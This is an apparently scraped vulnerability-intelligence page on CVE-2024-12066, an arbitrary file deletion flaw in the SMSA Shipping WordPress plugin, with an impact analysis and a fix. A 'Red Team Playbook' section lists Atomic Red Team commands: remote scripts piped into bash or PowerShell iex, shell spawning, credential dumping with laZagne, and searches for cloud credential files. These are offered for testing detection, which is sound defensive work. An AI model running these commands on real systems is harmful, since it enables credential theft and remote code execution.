CVE-2024-12066
Overview
This vulnerability is an arbitrary file deletion flaw caused by insufficient validation of file paths within the smsa_delete_label() function of the SMSA Shipping (official) WordPress plugin. The root cause lies in the failure to properly sanitize user-supplied input used to specify file locations, allowing traversal outside intended directories. The affected component is the file deletion mechanism in all plugin versions up to and including 2.3.
Vulnerability Description
The SMSA Shipping(official) plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the smsa_delete_label() function in all versions up to, and including, 2.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php). CVE-2024-49249 is likely a duplicate of this issue.
Impact
An attacker with at least Subscriber-level authentication can delete arbitrary files on the server, including critical configuration files such as wp-config.php. This can result in remote code execution if key files are removed or replaced. The vulnerability requires no user interaction beyond authentication and is exploitable remotely over the network. Given the CVSS vector (AV:N/AC:L/PR:L/UI:N), the attack is low complexity with high impact on confidentiality, integrity, and availability of the affected system.
Solution
Upgrade the SMSA Shipping (official) WordPress plugin to version 2.4 or later, where proper file path validation in smsa_delete_label() has been implemented. Detailed patch information and source code fixes are available at the WordPress plugin repository and Wordfence advisory (https://www.wordfence.com/threat-intel/vulnerabilities/id/29d72347-ba49-45c6-a964-2c75064ac866). No additional workarounds are documented by the vendor.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the SMSA Shipping plugin for WordPress arises from inadequate validation of file paths within the smsa_delete_label() function. This flaw allows authenticated users, even those with minimal privileges such as Subscriber-level access, to delete arbitrary files from the server. The lack of stringent checks means that an attacker can craft a request to delete critical files, potentially leading to severe consequences such as remote code execution. The risk is exacerbated by the fact that WordPress installations often contain sensitive configuration files, such as wp-config.php, which, if deleted, can compromise the entire application.
Exploitation of this vulnerability can occur through various attack vectors. An authenticated attacker could leverage social engineering techniques to gain access to a legitimate user account with sufficient privileges. Once inside, the attacker could invoke the vulnerable function to delete files that are crucial for the operation of the WordPress site. For instance, deleting the wp-config.php file would disrupt the connection to the database, effectively taking the site offline. Additionally, if an attacker were to delete other files, such as those containing plugins or themes, they could create a pathway for further exploitation, including the installation of backdoors or other malicious code.
The real-world impact of this vulnerability can be significant for businesses that rely on WordPress for their online presence. The ability to delete arbitrary files can lead to downtime, data loss, and a potential breach of customer information, depending on the nature of the files deleted. For e-commerce sites, this could result in lost sales and damage to reputation, while for organizations that handle sensitive data, the consequences could include regulatory fines and legal repercussions. The high CVSS score of 8.8 indicates that this vulnerability poses a serious threat, particularly for organizations that may not have robust security measures in place.
To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regularly updating plugins and themes is crucial, as developers often release patches to address known vulnerabilities. Additionally, employing a web application firewall (WAF) can help filter out malicious requests and provide an additional layer of protection against exploitation attempts. Monitoring server logs for unusual file deletion activities can also aid in early detection of potential attacks. Furthermore, restricting user permissions to the minimum necessary for their roles can significantly reduce the risk of exploitation, ensuring that even if an account is compromised, the potential damage is limited.
In conclusion, the vulnerability within the SMSA Shipping plugin highlights the critical importance of secure coding practices and proper validation mechanisms in web applications. Organizations must remain vigilant in their security posture, employing both preventive and detective measures to safeguard their systems. By understanding the implications of such vulnerabilities and taking proactive steps to mitigate risks, businesses can protect their assets and maintain the trust of their customers in an increasingly hostile digital landscape.
CSURFACE threat intelligence has detected a marked increase in the Exploit Prediction Scoring System (EPSS) score for CVE-2024-12066, rising by over 30% in recent assessments. This upward trend, although not yet accompanied by confirmed exploit campaigns or new proof-of-concept releases, signals growing attacker interest and potential preparatory activity targeting the SMSA Shipping WordPress plugin vulnerability. The elevated EPSS percentile places this vulnerability among those with a higher likelihood of exploitation in the near term, underscoring an increased risk profile for organizations running affected plugin versions. Given the low privilege required for exploitation and the severe impact of arbitrary file deletion leading to possible remote code execution, defenders should recognize this shift as an early indicator of escalating threat potential. While no direct exploitation has been observed in the wild to date, the rising predictive metrics warrant heightened vigilance and prioritization within vulnerability management workflows.
Affected Products
No CPE information available.
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (5)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-12066 |
| wordfence.com |
GitHub CVE
|
https://www.wordfence.com/threat-intel/vulnerabilities/id/29d72347-ba49-45c6-a964-2c75064ac866?source=cve |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/browser/smsa-shipping-official/trunk/smsa-express-shipping.php#L235 |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/browser/smsa-shipping-official/tags/2.4/smsa-express-shipping.php#L246 |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/browser/smsa-shipping-official/tags/2.3/smsa-express-shipping.php#L251 |